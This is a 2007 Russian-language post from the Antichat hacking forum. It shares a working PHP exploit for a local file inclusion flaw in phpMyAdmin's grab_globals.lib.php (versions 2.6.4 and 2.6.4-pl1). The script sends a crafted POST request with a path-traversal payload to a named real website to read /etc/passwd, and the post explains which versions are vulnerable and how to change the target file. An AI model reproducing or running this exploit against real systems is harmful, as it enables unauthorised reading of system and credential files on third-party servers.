
12.12.2007, 04:45
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
да... все дело в версии например вот это работает:
PHP код:
<?php
$host="www.bafonline.net.nz";
$fl="../../../../../../../../../../etc/passwd";
$dira="/sql/";
$filo="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$fl."&subform[1][cXIb8O3]=1";
$leng=strlen($filo);
$qv="POST ".$dira."libraries/grab_globals.lib.php HTTP/1.0\nHost:".$host."\nContent-Type:application/x-www-form-urlencoded\nContent-Length:".$leng."\n\n";
$qv=$qv.$filo;
echo $qv;
$fp = fsockopen ($host, 80);
fputs ($fp, $qv);
while (!feof($fp))
{
echo fgets($fp);
}
?>
уязвимы версии 2.6.4 и 2.6.4-pl1, 2.6.4-pl2 уже не уязвима,более ранние версии как выяснилось тоже не уязвимы
вобщем сплоит чисто инклюдит файлы, читать пхп файлы не получится, вобщем все прелести и недостатки локального инклюда... в $fl записывается имя файла с относительным путем, т.е. относительно libraries
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 12.12.2007 в 05:37..
|
|
|